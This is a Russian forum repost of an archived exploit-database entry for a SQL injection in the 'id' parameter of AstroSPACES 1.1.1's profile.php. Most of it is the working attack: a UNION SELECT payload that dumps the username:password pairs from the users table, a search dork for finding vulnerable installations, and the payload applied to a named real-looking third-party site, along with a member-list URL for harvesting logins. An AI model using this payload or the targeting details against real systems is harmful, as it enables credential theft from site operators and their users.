Exploit AstroSPACES 1.1.1 - 'id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6758
Проверка EDB
  1. Пройдено
Автор
TURKISHWARRIORR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4642
Дата публикации
2008-10-15
Код:
# AstroSPACES (profile.php) SQL

  Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr  (Sehitler Ölmez Vatan Bölünmez ....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :

profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


test sites:

http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


E mail login :

http://quirino.com.ph/friendster/space.php?action=memberlist

##########################################################################
                               www.1923turk.org                    
                        [email protected]

# milw0rm.com [2008-10-15]
 
Источник
www.exploit-db.com

Похожие темы